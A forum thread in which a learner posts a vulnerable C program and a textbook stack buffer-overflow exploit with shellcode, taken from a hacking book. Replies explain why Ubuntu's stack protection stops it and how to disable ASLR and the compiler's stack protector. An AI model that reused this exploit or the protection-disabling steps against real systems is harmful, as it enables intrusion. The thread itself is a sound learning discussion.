*** stack smashing detected ***

This is a discussion on *** stack smashing detected *** within the C Programming forums, part of the General Programming Boards category; Hi, I'm trying to learn som C programming from this "Hacking" book by Jon Erickson and this code is taken ...

  1. #1
    Registered User
    Join Date
    Apr 2007
    Posts
    3

    *** stack smashing detected ***

    Hi,

    I'm trying to learn som C programming from this "Hacking" book by Jon Erickson and this code is taken from that book.

    Both programs compile error-free and there are no other problems.
    They are compiled with Gcc 4.1.2 on Ubuntu 4.1.1 (if it should matter.)

    The problem is when i try to run exploit. I get this message:

    Stack pointer (ESP) : 0xbf963908
    Offset from ESP : 0x0
    Desired return addr; 0xbf963908
    *** stack smashing detected ***: vuln terminated
    Aborted



    vuln.c:
    Code:
    int main(int argc, char *argv[])
    {
    	char buffer[500];
    	strcpy(buffer, argv[1]);
    	return 0;
    }


    exploit.c
    Code:
    #include <stdlib.h>
    
    
    
    char shellcode[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
    		   "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
    		   "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x72"
    		   "\x68";
    
    unsigned long sp(void)
    {__asm__("mov %esp, %eax");}
    
    int main(int argc, char *argv[])
    {
    	int i, offset;
    	long esp, ret, *addr_ptr;
    	char *buffer, *ptr;
    
    	offset = 0;
    	esp = sp();
    	ret = esp -offset;
    
    	printf("Stack pointer (ESP) : 0x%x\n", esp);
    	printf("     Offset from ESP : 0x%x\n", offset);
    	printf("Desired return addr: 0x%x\n", ret);
    
    	buffer = malloc(600);
    
    	ptr = buffer;
    	
    	addr_ptr = (long *) ptr;
    	for (i=0; i < 600; i+=4)
    		{ *(addr_ptr++) = ret; }
    
    	for (i=0; i < 200; i++)
    	
    	{buffer[i] = '\x90'; }
    		
    	
    	ptr = buffer + 200;
    	for(i=0; i < strlen(shellcode); i++)
    	{ *(ptr++) = shellcode[i]; }
    
    	buffer[600-1] = 0;
    
    	execl("./vuln","vuln", buffer, 0);
    
    	
    	free(buffer);
    
    	return(0);
    
    }

    I'm just a beginner to C soo i would appreciate any comments.

    - Martin

  2. #2
    Captain Crash brewbuck's Avatar
    Join Date
    Mar 2007
    Location
    Portland, OR
    Posts
    7,237
    Imagine that! The security features of Ubuntu are working properly to prevent this silly exploit from working! It's just UNBELIEVABLE!

  3. #3
    Registered User
    Join Date
    Apr 2007
    Posts
    3

    RE:

    I guess it's just a silly exploit, but that's not the point.

    So you are saying it's a security feature in ubuntu...thanks for that.

    - Martin

  4. #4
    Registered User
    Join Date
    Dec 2006
    Posts
    15
    Yeh Ubuntu is quite good in that respect. I've never seen the exact message you get, but I know that Ubuntu randomizes the location of the stack making it very hard for buffer overflows to be successful

    Edit:
    Its called the linux VA patch
    try this:
    echo 0 > /proc/sys/kernel/randomize_va_space

  5. #5
    Registered User
    Join Date
    May 2009
    Posts
    1
    just try this exploit running on windows and it will work =). I tried to compile the code with Bloodshed GCC and all worked fine.

  6. #6
    Kernel hacker
    Join Date
    Jul 2007
    Location
    Farncombe, Surrey, England
    Posts
    15,677
    Quote Originally Posted by isam2k View Post
    just try this exploit running on windows and it will work =). I tried to compile the code with Bloodshed GCC and all worked fine.
    Interesting - last time I checked, INT 0x80 wasn't really doing Linux style system calls when performed in Windows...

    --
    Mats
    Compilers can produce warnings - make the compiler programmers happy: Use them!
    Please don't PM me for help - and no, I don't do help over instant messengers.

  7. #7
    Registered User slingerland3g's Avatar
    Join Date
    Jan 2008
    Location
    Seattle
    Posts
    602
    Nice! try running with the gcc option -fno-stack-protector, then you will see a seg fault of sorts with this code.

  8. #8
    spurious conceit MK27's Avatar
    Join Date
    Jul 2008
    Location
    segmentation fault
    Posts
    8,300
    Quote Originally Posted by Martin_HS View Post
    Hi,

    I'm trying to learn som C programming from this "Hacking" book by Jon Erickson and this code is taken from that book.
    That is a terrific and really well written book. I started learning C with that book, altho I still haven't finished it. Is that from chapter 3?

    I didn't like using the cd either so I just compiled that version of gcc from source and called it "gcc336"*; I think that anti-smashing protection will only work with gcc 4+, so you should be able to do all the experiments. Also, all the gdb output will be identical to his, which makes stuff easier to follow than if you use a different compiler version.

    *so rather than "gcc myprog.c" you'd use "gcc336 myprog.c"
    Last edited by MK27; 05-28-2009 at 04:04 PM.
    C programming resources:
    GNU C Function and Macro Index -- glibc reference manual
    The C Book -- nice online learner guide
    Current ISO draft standard
    CCAN -- new CPAN like open source library repository
    3 (different) GNU debugger tutorials: #1 -- #2 -- #3
    cpwiki -- our wiki on sourceforge

  9. #9
    Registered User slingerland3g's Avatar
    Join Date
    Jan 2008
    Location
    Seattle
    Posts
    602

  10. #10
    ch4
    ch4 is offline
    Newbeer ch4's Avatar
    Join Date
    Jan 2007
    Posts
    142
    Yesterday i got the same message
    Not too rarely finally.

    Ubuntu 8.10

Popular pages Recent additions subscribe to a feed

Similar Threads

  1. *** stack smashing detected ***
    By chakra in forum C Programming
    Replies: 2
    Last Post: 06-09-2009, 09:12 PM
  2. stack and pointer problem
    By ramaadhitia in forum C Programming
    Replies: 2
    Last Post: 09-11-2006, 11:41 PM
  3. Question about a stack using array of pointers
    By Ricochet in forum C++ Programming
    Replies: 6
    Last Post: 11-17-2003, 09:12 PM
  4. error trying to compile stack program
    By KristTlove in forum C++ Programming
    Replies: 2
    Last Post: 11-03-2003, 05:27 PM
  5. Stack Program Here
    By Troll_King in forum C Programming
    Replies: 7
    Last Post: 10-15-2001, 05:36 PM

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21